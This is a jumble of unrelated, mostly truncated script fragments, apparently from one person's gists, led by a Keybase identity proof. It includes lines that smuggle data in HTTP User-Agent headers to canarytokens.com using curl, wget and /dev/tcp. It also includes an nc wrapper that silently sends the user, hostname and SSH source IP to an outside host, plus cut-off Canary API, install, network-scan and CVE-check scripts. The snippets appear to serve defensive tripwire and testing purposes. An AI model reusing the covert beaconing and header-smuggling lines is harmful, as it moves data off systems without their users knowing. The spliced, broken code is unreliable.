I hereby claim:
- I am sawaba on github.
- I am adriansanabria (https://keybase.io/adriansanabria) on keybase.
- I have a public key ASB_775JHuSPY2VjHpo6kYDsJCI74ICzkgipLHiMLNCSngo
To claim this, I am signing this object:
curl -s -A "smuggled message" http://canarytokens.com/tokenurl
wget -U "smuggled message" http://canarytokens.com/tokenurl
exec 3<>/dev/tcp/canarytokens.com/80
echo -e "GET /articles/traffic/guln4qekd7zjfd4thw5sw48uh/post.jsp HTTP/1.1\r\nUser-Agent: If i trip my own token, i can pass it any useragent info i want to, effectively smuggling data in a token\r\nHost: canarytokens.com\r\nAccept: */*\r\n\r\n">&3
declare -a sshclient
sshclient=($SSH_CLIENT)
args="$@"
curl -s -A "Someone just ran nc $args as User:$USER on Hostname:$HOSTNAME from SourceIP: ${sshclient[0]}" http://7c589debfgpn.o3n.io/files/dkgs6rpqh7nyjrf1hr1pabc7u/logo.gif > /dev/null
/bin/nc "$@"
# Generate AWS Creds 0.1
# canarygen_awscreds.py
#
# This is the "auto" version of this script. Run it unattended and it will
# automatically grab username and hostname variables from the system it is
# run on.
#
# PREREQS
# python 3
# pip3 install canarytools
import requests
import sys
import re
def main(args):
    if len(args) < 2:
        print("usage: python delete_tokens.py <console_url> <api_key>")
    auth = args[1]
    console = args[0]
    get_url = "{base}/api/v1/canarytokens/fetch?auth_token={auth}".format(
@echo off
REM Test script to generate AWS creds
REM Requires curl and jq. Customize name/path to EXEs below.
set curl=curl
set jq=jq-win64.exe
REM Grab the date and time for creating unique files
for /f "tokens=1,2,3,4 delims=/ " %%a in ('date /t') do set currdate=%%d%%c%%b
for /f "tokens=1,2,3,4 delims=.:" %%a in ("%time%") do set currtime=%%a%%b%%c
#!/bin/bash
# Create a CSV with the last week's worth of alerts from your Canary console
# Requires curl and jq to be in the path
# Set this variable to your API token
export token=deadbeef12345678
# Customize this variable to match your console URL
export console=ab123456.canary.tools
#!/bin/bash
# This script adapted from an older post on StackOverflow by user fieldju
# https://stackoverflow.com/questions/36478741/installing-oracle-jdk-on-windows-subsystem-for-linux
# The script was for JDK 8.
# Due to major changes with JDK 11 (no JRE, no Derby, Unlimited Strength included), it was necessary to update the entire script.
set -ex
# UPDATE THESE URLs (this one updated as of 2019-03-06)
export JDK_URL=http://download.oracle.com/otn-pub/java/jdk/11.0.2+9/f51449fcd52f4d52b93a989c5c56ed3c/jdk-11.0.2_linux-x64_bin.tar.gz
@echo off
goto begin
+-----------------------------------------------------------------------------+
| Internal Network Discovery Scan |
| |
| DESCRIPTION: This script discovers NETWORKS, not hosts. It attempts to find |
| every class C in use throughout the enterprise. Note that, on larger ranges,|
| we're sampling IPs to save time. This is a calculated time/accuracy tradeoff|
| |
@echo off
REM Local Windows check to ensure we're safe from CVE-2017-11937
REM https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11937
cls
ECHO.
ECHO CVE-2017-11937 Vulnerability Check version 1.0
ECHO Checking to make sure your antivirus isn't going to sell you out to cyberbaddies.
ECHO The last vulnerable version was 1.1.14306.0 - anything newer should be safe.
ECHO.